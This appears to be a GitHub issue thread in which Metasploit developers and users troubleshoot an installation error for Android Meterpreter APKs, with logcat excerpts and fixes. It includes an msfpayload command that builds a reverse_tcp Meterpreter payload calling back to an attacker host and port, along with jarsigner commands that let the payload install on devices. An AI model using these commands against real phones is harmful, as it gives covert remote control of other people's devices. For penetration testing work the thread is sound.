Meterpreter apk receives "INSTALL_PARSE_FAILED_NO_CERTIFICATES" error.

[frenchbeard]

I've tried recently to use the android meterpreter (reverse_tcp, http and https), and all apk generated from msfpayload give out the same error on install (be it through adb or direct install on the phone). The error is "INSTALL_PARSE_FAILED_NO_CERTIFICATES", on both Samsung Galaxy S4 LTE-A's CyanogenMod11 and Alcatel One Touch stock 4.4.2.
I do not know if the problem lies with the android meterpreter itself or msfpayload.

[timwr]

Thanks for reporting @audhulma, I'm unable to reproduce it here unfortunately on a S4 UK edition. Could you provide the output of "adb logcat" when you try to install the apk please?
http://developer.android.com/tools/help/adb.html

I'm installing with:

./msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 R > android.apk
adb install android.apk
(obviously, but to avoid confusion).

Could you also try sign it manually with the command:

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android android.apk androiddebugkey
adb install android.apk

to see if that works around the issue?

[frenchbeard]

Logcat returns :

W/linker (25942): libvcodec_oal.so has text relocations. This is wasting memory and is a security risk. Please fix.
W/linker (25942): libvp8dec_sa.ca7.so has text relocations. This is wasting memory and is a security risk. Please fix.
W/linker (25942): libvp9dec_sa.ca7.so has text relocations. This is wasting memory and is a security risk. Please fix.
W/linker (25942): libvc1dec_sa.ca7.so has text relocations. This is wasting memory and is a security risk. Please fix.
I/PackageParser( 668): com.metasploit.stage: compat added android.permission.WRITE_EXTERNAL_STORAGE
E/PackageParser( 668): Package com.metasploit.stage has no certificates at entry classes.dex; ignoring!

The rest of the log is just the usual for an install through adb.
Using jarsigner manually seems to resolve the problem. I think it comes from my metasploit installation more so than anything else, but I already have reinstalled it once to try and fix this issue, but to no avail.

[timwr]

Apologies @audhulma I can't reproduce however @jvennix-r7 can! What OS are you running on?

[jvennix-r7]

Solved. Something strange with the openssl lib causes it to behave differently when you forget to sign the cert. I fixed the issue here, closing this now:

rapid7/metasploit-framework#4186

[timwr]

Weird I'm seeing this on a HTC Desire HD, 2.3.5 (but not on a Galaxy S4):

E/PackageParser( 1374): Package com.metasploit.stage has no certificates at entry classes.dex; ignoring!

[frenchbeard]

Had the same on the Galaxy S4, but using jarsigner as described in a previous made it behave normally (tedious to do so each time though...).
@timwr : sorry for the lack of answer on your question, the notification must have gotten lost on my side, so, regarding the OS, nightlies of cyanogen mod (ks01lte) for the phone, archlinux for the computer where the payload was generated.

[bcook-r7]

Just to add in a couple of data points, I started with an ancient HTC Vision running cyanogenmod 7.2rc1 (Android 2.3 something), it accepted the apk without issue. I then updated it to an AOSP 4.2.2 derivative and INSTALL_PARSE_FAILED_NO_CERTIFICATES showed up.

[timwr]

I can reproduce this but no closer to fixing it. I'll try find some time for this soon.

[toabi]

I have the same problem, here is what the log said (excerpt):

…
D/AndroidRuntime(12952): Calling main entry com.android.commands.pm.Pm
I/ApplicationPolicy( 2146): isApplicationInstallationEnabled
W/PackageManager( 2146): verifying app can be installed or not
I/PackageParser( 2146): com.metasploit.stage: compat added android.permission.WRITE_EXTERNAL_STORAGE
D/dalvikvm( 2146): WAIT_FOR_CONCURRENT_GC blocked 0ms
E/PackageParser( 2146): Package com.metasploit.stage has no certificates at entry classes.dex; ignoring
…

Sorry, I just saw somebody posted it before.

Thing is, I cannot even use the jarsigner method to get this apk installed. The phone is on android 4.1.2.

:edit: Fun fact: The jarsigner method works as soon as I add -tsa http://timestamp.digicert.com as an argument.

[frenchbeard]

Hi @toabi, to be honest with you, I haven't had this problem in a (very) long while, but this log sure does look familiar.
I guess you already checked, but everything up to date on your end ?

Regarding the "-tsa", I never had to go that far, a simple jarsigner with my own keystore was sufficient to bypass said problem. Do you have any anti-virus / malware soft on the phone, by any chance ?

[timwr]

Quick update:
I can reproduce this with a android-15 x86 emulator, which should in theory make it easier to fix.
I was still getting the error with -tsa http://timestamp.digicert.com
This workaround seems to work for me:

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA payload.apk androiddebugkey